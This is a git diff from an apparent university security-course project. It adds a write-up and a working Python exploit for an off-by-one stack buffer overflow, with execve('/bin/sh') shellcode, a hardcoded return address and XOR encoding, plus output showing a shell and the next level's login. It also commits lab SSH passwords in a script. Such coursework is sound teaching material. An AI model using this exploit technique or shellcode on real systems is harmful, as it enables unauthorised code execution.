diff --git a/proj1/explain.md b/proj1/explain.md
index 373fd730c264f3d1c42e9776b2d8dfb291d24c0a..52cad479eeb2d05da164a0b663b5059dbb3719f4 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -149,3 +149,77 @@ b = binascii.unhexlify(payload)
 with open('/dev/fd/1','wb') as f:
     f.write(b)
 ```
+
+## 3
+
+The question is off-by-one overflow problem. After reading aslr.pdf figure 30, I know that I should set %ebp to &buf[0] (0xbffffa40), and put the new return address in &buf[1], and put the payload. So I should overflow an "40" to %ebp. Now I'll do it.
+
+However, after implementing the solution above, ./debug-exploit works but ./exploit doesn't. That's because overflowed "0x40" xor "1<<5" yields "`", which is beaking the shell (in the buggy exploit script). So I shift everything 4 bytes right. Now %ebp is set to &buf[1] and new return address is set to &buf[2] and overflowed byte is "44". Now everything is OK.
+
+```
+pwnable:~$ ./exploit
+#Eg#EgLï¿½ï¿½ï¿½j1XÍ€ï¿½Ã‰ï¿½jFXÍ€1ï¿½Ph//shh/binT[PSï¿½ï¿½1Ò°
+
+Dï¿½ï¿½ï¿½9ï¿½ï¿½ï¿½'ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½]ï¿½ï¿½ï¿½'ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½4ï¿½ï¿½ï¿½
+/home/brown $ cat README
+Remember, all I'm offering is the truth. Nothing more.
+
+Next username: jz
+Next password: cqkeuevfIO
+```
+
+My `./arg` is still attached below. Note that my `./egg` is empty.
+
+```
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+## The FUCKING silly script booms the shell because overflow="40"="`".
+## cs161-atw
+#raddr = "bffffa48"
+##shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+#shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+#
+#overflow = "40" 
+#buf0 = "01234567"
+#
+#length_to_fill = 64 - 8 - int(len(shellcode)/2)
+#fill = "01" * length_to_fill
+#
+#payload = buf0 + revert(raddr) + (shellcode) + fill + overflow
+
+## cs161-atw
+raddr = "bffffa4c"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+
+overflow = "44"
+buf0 = "01234567"
+
+length_to_fill = 64 - 8 - 4 - int(len(shellcode)/2)
+fill = "01" * length_to_fill
+
+payload = buf0 + buf0 + revert(raddr) + (shellcode) + fill + overflow
+
+
+import binascii
+
+b = binascii.unhexlify(payload)
+b = bytes([byte^(1<<5) for byte in b])
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+
+```
+
+
+
diff --git a/proj1/solution/arg3 b/proj1/solution/arg3
new file mode 100755
index 0000000000000000000000000000000000000000..ba1d8b9e8435fd3373cd5e557289cb7b35c04d8b
--- /dev/null
+++ b/proj1/solution/arg3
@@ -0,0 +1,49 @@
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+## The FUCKING silly script booms the shell because overflow="40"="`".
+## cs161-atw
+#raddr = "bffffa48"
+##shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+#shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+#
+#overflow = "40" 
+#buf0 = "01234567"
+#
+#length_to_fill = 64 - 8 - int(len(shellcode)/2)
+#fill = "01" * length_to_fill
+#
+#payload = buf0 + revert(raddr) + (shellcode) + fill + overflow
+
+## cs161-atw
+raddr = "bffffa4c"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+
+overflow = "44"
+buf0 = "01234567"
+
+length_to_fill = 64 - 8 - 4 - int(len(shellcode)/2)
+fill = "01" * length_to_fill
+
+payload = buf0 + buf0 + revert(raddr) + (shellcode) + fill + overflow
+
+
+import binascii
+
+b = binascii.unhexlify(payload)
+b = bytes([byte^(1<<5) for byte in b])
+with open('/dev/fd/1','wb') as f:
+    f.write(b)
+
+
diff --git a/proj1/solution/egg3 b/proj1/solution/egg3
new file mode 100755
index 0000000000000000000000000000000000000000..13f47935d98bc44bbe5f7dafb745814aab2b8b79
--- /dev/null
+++ b/proj1/solution/egg3
@@ -0,0 +1,2 @@
+#!/bin/sh
+
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index 7588d59878cc0aee8820f194f088f06b99f6c7ee..cf5d074634db9ec39a965c989590b85bacaf9d20 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -6,5 +6,6 @@ if [[ $1 == remote ]]; then
 else
     echo 'Connecting localhost...'
     #sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
-    sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  smith@localhost -p 16161
+    #sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  smith@localhost -p 16161
+    sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  brown@localhost -p 16161
 fi